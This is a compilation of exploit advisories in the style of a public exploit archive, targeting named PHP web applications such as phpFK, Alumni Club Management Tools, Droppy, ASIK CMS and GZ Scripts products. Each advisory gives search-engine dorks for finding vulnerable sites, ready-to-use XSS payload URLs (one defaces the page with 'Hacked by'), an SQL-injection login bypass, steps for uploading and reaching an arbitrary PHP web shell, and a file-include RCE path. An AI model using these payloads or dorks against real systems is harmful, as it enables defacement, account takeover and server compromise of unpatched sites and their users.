<pre><code>====================================================================================================================================<br />| # Title : phpFK v9.2 Beta version SQLi + XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit) | <br />| # Vendor : https://www.frank-karau.de/demo-forum/ | <br />| # Dork : Powered by: phpFK |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}<br /><br />[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.editpubdz.com/ | <br />| # Dork : intext:"Powered By Editpub" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Alumni Club Management Tools v 2.2.7 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | <br />| # Vendor : http://alumnimagnet.com | <br />| # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /events.html?daily_detail&date=27-3-2019'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/edu/events.html?daily_detail&date=27-3-2019%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : AngularJS Filemanager v1.5.1 File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://github.com/joni2back/angular-filemanager/archive/master.zip | <br />| # Dork : N/A |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] suffers from an arbitrary file upload vulnerability.<br /><br />[+] http://127.0.0.1/guruquest.net/file-manager/<br /><br />[+] upload your Ev!l php file<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Alumni Club Management Tools v 2.2.7 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | <br />| # Vendor : http://alumnimagnet.com | <br />| # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] suffers from remote sql injection as well From within the control panel, malicious files can be uploaded .<br /><br />[+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login .<br /><br />[+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files<br /><br />[+] find your files https://127.0.0.1/edu/admin_files.html<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] RCE Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://lulus.smkn2purwokerto.sch.id/admin.zip | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] the infected File :<br /><br /> <?php<br /><br /> require "config.php";<br /> error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));<br /> $page=$_GET['page'];<br /> $filename="content/$page.php";<br /> if (!file_exists($filename))<br /> {<br /> include "content/home.php";<br /> }<br /> else<br /> {@include "content/$page.php";}<br /> ?><br /><br />[+] RCE : /index.php?page= [Ev!l]<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>============================================================================================================================<br />| # Title : Amazon S3 Droppy v 1.4.6 File Upload Vulnerability |<br />| # Author : indoushka |<br />| # email : indoushka4ever@gmail.com |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/droppy-online-file-sharing/10575317 | <br />| # Dork : n/a |<br />============================================================================================================================<br /><br />poc :<br /><br />[+] Droppy is an online file sharing platform that can be used to share multiple files among friends, <br /><br /> family and colleagues. The files can be sent by email or an url that can be shared with everyone you would like to.<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Select file Ev!l.php and send it to your e-mail or to direct link.<br /><br />[+] it can be accessed remotely and run code execution.<br /><br />[+] script save a copy of your file in the web server in dir " uploads/" with a secret code<br /><br />[+] when you click in link to download your file right click and choose view source of download link not the page of your email:<br /><br />[+] Exampel : view-source:http://droppy.proxibolt.com/PrHEtFg<br /><br />[+] The script stores the attached files sent inside the hosting server of the website<br /><br /> It does not give you the storage path, but when you open the source code of the sending page, <br /> <br /> you will find the path of the attached file, and it can be accessed remotely and run<br /> <br /> Means line 100 It contains the secret code generated randomly by the script that <br /> <br /> renames the file attached to it and stores it inside the folder<br /> <br /> And when you enter the storage path and combine the secret code with the file name, <br /> <br /> the file opens for you inside the server,<br /><br />[+] Line 99 , 100 , 101<br />><br />> <input type="hidden" name="action" id="action" value="download"><br />> <input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72"><br />> <input type="hidden" name="download_id" id="download_id" value="PrHEtFg"><br />><br />[+] add the secret code with name of your file that give you access .<br /><br />[+] http://127.0.0.1/Droppy/uploads/c40c11023e25cb7cfcba1345c4e26f72-x.php<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/gz-multi-hotel-booking-system.html │<br />│ Vendor : GZ Scripts │<br />│ Software : GZ Multi Hotel Booking System 1.8 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /index.php<br /><br />GET 'adults' parameter is vulnerable to RXSS<br /><br />https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2<br /><br />Path: /index.php<br /><br />GET 'children' parameter is vulnerable to RXSS<br /><br />https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2<br /><br />Path: /index.php<br /><br />GET 'cal_id' parameter is vulnerable to RXSS<br /><br />https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/gz-e-learning-platform.html │<br />│ Vendor : GZ Scripts │<br />│ Software : GZ E Learning Platform 1.8 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/index.php/sxiqd"><script>alert(1)</script>ilec2?controller=GzUser&action=edit&id=5<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/php-crm-platform.html │<br />│ Vendor : GZ Scripts │<br />│ Software : CRM Platform 1.8 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br /><br />Path: /index.php<br /><br />GET 'action' parameter is vulnerable to RXSS<br /><br />https://website/index.php?controller=GzAdmin&action=dashboardpsrfg%3cscript%3ealert(1)%3c%2fscript%3ea4o1z&err=2<br /><br /><br /><br />[-] Done<br /></code></pre>